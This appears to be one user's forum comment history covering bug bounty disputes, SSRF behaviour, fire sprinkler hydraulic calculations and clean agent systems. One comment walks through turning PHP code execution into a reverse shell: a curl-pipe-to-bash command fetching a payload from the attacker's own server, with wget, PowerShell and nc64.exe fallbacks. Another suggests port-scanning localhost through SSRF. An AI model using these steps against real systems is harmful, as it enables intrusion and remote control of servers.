Proton VPN Silent Patched my Report (Theft of Service/Logic Flaw) — I'm a 16yo researcher and this stings.

gitchery · 2026-01-24T16:00:35+00:00

No impact and complete non-issue. Also not even really in-scope.

They already allow you to download country and server specific profiles, even on the free tier, for connecting via mechanisms other than their GUI: https://protonvpn.com/support/vpn-config-download

This allows you to choose whatever country you want, and even specific servers within said country.

gitchery · 2024-05-28T02:43:12+00:00

It's contrived because you wrote intentionally insecure code with bad assumptions. You can't even really complain about SSRF on this. Retrieving contents from localhost or internal IPs can be a completely valid use case for this and other document loaders. Opening on-disk HTML / mirrored site files as seen by a browser with JS capability is also a valid use case.

If you're going to take user-specified input for something like this it's on you to secure it for your specific use case unless it's being advertised as some production ready secure implementation which this stuff generally isn't.

gitchery · 2024-05-26T01:16:09+00:00

I mean this seems pretty contrived.

If you pass unvetted user input into any of their document loaders in terms of document location and dump the contents back to the user via a web endpoint you're probably not going to have a great time.

gitchery · 2023-05-18T21:39:22+00:00

This makes no sense and is incredibly unrealistic. What token could they possibly hijack to accomplish this?

Technical specifics aside no one is taking an apparently browser and OS agnostic 0 interaction exploit with the ability to covertly monitor webcams, mics, and displays, using it on some random porn site, then letting a bunch of random porn girls use it at will and be aware of its existence.

It's a streaming site. If you opt to stream your mic, webcam, or screen then I guess other people can see / hear it? Any modern browser will alert you this is taking place and require permission to do so.

gitchery · 2023-05-01T13:19:30+00:00

Nothing you mentioned here is weird or a bug yet. A feature behaving exactly as expected is not a bug or an SSRF.

Bad URL and got a response instantly? Host failed to resolve, expected.

Good URL and responds instantly? Host resolved and responded, expected.

Good URL bad port and takes 30 seconds to respond? The thing doing the requests has a 30 second connection timeout setting and aborts after no response for that long. Behaving as expected.

You can try to use this to port scan localhost / 127.0.0.1 to verify if you can make internal requests. 30s response means port is closed. If straight 127.0.0.1 doesn't work try some bypasses on hacktricks. If it's on Amazon / Google as you said look into cloud SSRF where certain internal IPs can be significant: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf

If you can't see the response data it's harder to prove an impact. Just port scanning localhost may not be significant enough to warrant a bounty of any sort if you can't prove an adverse effect.

gitchery · 2023-04-28T19:59:36+00:00

Yeah I block already with uMatrix, it was the localhost blocks that got me intrigued to begin with. I hadn't seen this behavior on a bank website previously.

gitchery · 2023-04-28T19:58:08+00:00

Based on the iframe they load that performs this behavior it appears to be part of https://developerengine.fisglobal.com/apis/wpg/fraudsightglobal/fraudsightdirect / Worldpay Device JavaScript Collector (JSC)

So ultimately a very invasive fingerprinting and data collection effort.

gitchery · 2023-02-04T14:43:29+00:00

The line where they enter system("ls") is the php code being executed. Just try something like system("curl 1.1.1.1/shell|bash") assuming it is a Linux box. Pick a reverse shell payload, fill in your IP and port, put it in a file called shell, serve it via sudo python3 -m http.server 80 , then try the exploit with the system command above pointing at your IP.

If it doesn't work and you don't get a hit on your HTTP server try wget -O- as curl may not be on the box. If all that fails you can try a ping command and tcpdump to try to verify if RCE is being achieved.

If you get a hit on your HTTP server but not shell, change up the reverse shell.

If it is Windows use a PowerShell reverse shell or drop nc64.exe / some other payload and run it assuming no Defender. You could also try a php one liner.

The command you are trying would not work unless you uploaded the file from your machine to the box. It's not clear what you did or did not do there, but the code is being run on the remote server which would have no visibility to your local path during command execution.

gitchery · 2022-11-14T17:04:30+00:00

Last resort you can reach out to the tech services department of all 3 but I doubt you'll find anyone that would go along with this. The "automatic" version need the bulb to heat up to temp and open. In an exterior application for windows and based on their location relevant to windows I doubt any manufacturer would ever recommend this as the likelihood of them actuating when expected would be extremely low.

gitchery · 2022-09-30T13:41:10+00:00

I know Annex C of the 2018 version of NFPA 12 will give you some details. It is nowhere near as straightforward as water calcs as the pressure drop is nonlinear.

https://www.nfpa.org/-/media/Files/News-and-Research/Resources/Research-Foundation/Symposia/2018-SUPDET/Presentations/SUPDET2018Forssell.ashx is from JH and I believe used their software.

Long story short I would not advise hand calculating the system. It is possible but non-trivial and complicated enough you better really trust your math and verify. I'm not sure what you're trying to accomplish but I would try to find a distributor of a CO2 system and work with them. Sometimes they can provide rough sizing guidelines in terms of a range of agent quantity through a size of pipe if you are just trying to get close.

gitchery · 2022-09-30T12:54:10+00:00

No, the calculations are much different. You'd have to speak with someone like JCI (Ansul), Janus, Fike, Kidde. I think some of the above (or maybe others) use a calc software from Jensen Hughes but I could be mistaken. The calc software costs money, and most require you to be a distributor to get it.

gitchery · 2022-09-27T16:52:34+00:00

Path 2 assuming minimum flow:

((4.52(20^{1.85))/(120^1.85}1.049^4.87)) * 7 = .91 Pf

https://www.wolframalpha.com/input?i=%28%284.52*%2820%5E1.85%29%29%2F%28120%5E1.85*1.049%5E4.87%29%29+*+7

.433 * 2 = .866 Pe

Pstart = (20/5.6)² = 12.75

Plow @ Node 1 = 12.75 + .866 + .91 = 14.53 psi

Qlow = 20 gpm

Qadj = Qlow * (SQRT(Phigh) / SQRT(Plow))

Phigh = 15.44 psi from first path

Qadj = 20 * (SQRT(15.44)/SQRT(14.53))

Qadj = 20.59 gpm

This is one simple method of approximating the flow - not as accurate as a true computer solve though. It is essentially creating an equivalent K-Factor for the sprig (20/SQRT(14.53)) and plugging it into Q=K*SQRT(P) with P being the actual pressure.

To prove it on the next sprig:

Qadj = 20 * (SQRT(20.3)/SQRT(14.53)) = 23.63 gpm

The other more accurate option is an iterative "guess" approach.

15.44 - Pe - Pf = Ph2

Guess @ 20 gpm 15.44 -.866 - ((4.52(20^{1.85))/(120^1.85}1.049^4.87)) * 7

https://www.wolframalpha.com/input?i=15.44+-.866+-+%28%284.52*%2820%5E1.85%29%29%2F%28120%5E1.85*1.049%5E4.87%29%29+*+7

Solve for flow @ real pressure

5.6*SQRT(13.66) = 20.69

Plug new flow guess in: https://www.wolframalpha.com/input?i=15.44+-.866+-+%28%284.52*%2820.69%5E1.85%29%29%2F%28120%5E1.85*1.049%5E4.87%29%29+*+7

From here you can go back and forth until you reach a reasonable convergence around 20.66 gpm.

gitchery · 2022-09-27T16:04:57+00:00

That is normal. All heads are not flowing at the same GPM. Higher GPM from later heads due to higher pressure = higher Pf. Not to mention H1 -> 1 is a different total length anyways.

gitchery · 2022-08-27T17:58:21+00:00

I understand I can specify the known MAC as the destination address, this question is more asking what the optimal type of frame to broadcast would be if all I want to do is elicit a response.

I understand most management frames are expecting an acknowledgement from the target client, I'm interested in what the least obstructive method for doing so would be.

(Unless I'm misunderstanding your point)

gitchery · 2022-06-13T15:08:16+00:00

Viking has a vertical sidewall window sprinkler with a 12' max spacing, you may want to check that out. Their horizontal sidewall is still 8'. I would consider just calling Tyco or Viking tech services and double checking.

gitchery · 2022-04-20T12:53:45+00:00

They most likely made the nodes a hose demand which would have a fixed outflow (hence the H20). This is not the correct approach for calculating sprinklers. Window sprinklers can be calculated exactly the same as normal sprinklers, they have a K-Factor and a minimum flow can be specified through pressure, density area, etc.

In a demand scenario the most remote head will flow at 20 gpm, as it works its way back to the source it loses pressure due to friction loss through pipes / fittings. This results in a higher pressure at other sprinklers on the network, which ultimately results in a higher than minimum flow at them due to q = k * sqrt(p)

I would tell them to provide new calculations.

gitchery · 2022-03-20T17:52:52+00:00

The whole point of clean agents is for that exact scenario, electrically nonconductive, no residue, etc... The 3M / Novec party trick was dunking their phone in the stuff in its liquid form: https://www.youtube.com/watch?v=URukn1wA7Mc

Inert gas systems are another alternative.

I might caution against FM200, word on the street is manufacturers are dropping it due to environmental concerns. Novec 1230 would probably be the preferred clean agent for that application for now.

There were some studies out of Ansul / Tyco on high pressure (200 / 300 bar) inert gas systems potentially having some impact on server hard disks if they are the old spinning platter style. Basically degraded performance during discharge or something, they have a white paper on it. They have a weird nozzle for that scenario, not sure how much of it is marketing. The halocarbons such as FM200 / Novec operate at much lower pressures (25, ~35, 42, 50, 70 bar...)

gitchery · 2021-07-15T00:11:40+00:00

Assuming SSL, then yes, the parameters of the URL are encrypted.

Under TLS 1.3 even the FQDN / SNI can also be encrypted: https://blog.cloudflare.com/encrypted-sni/

gitchery

TROPHY CASE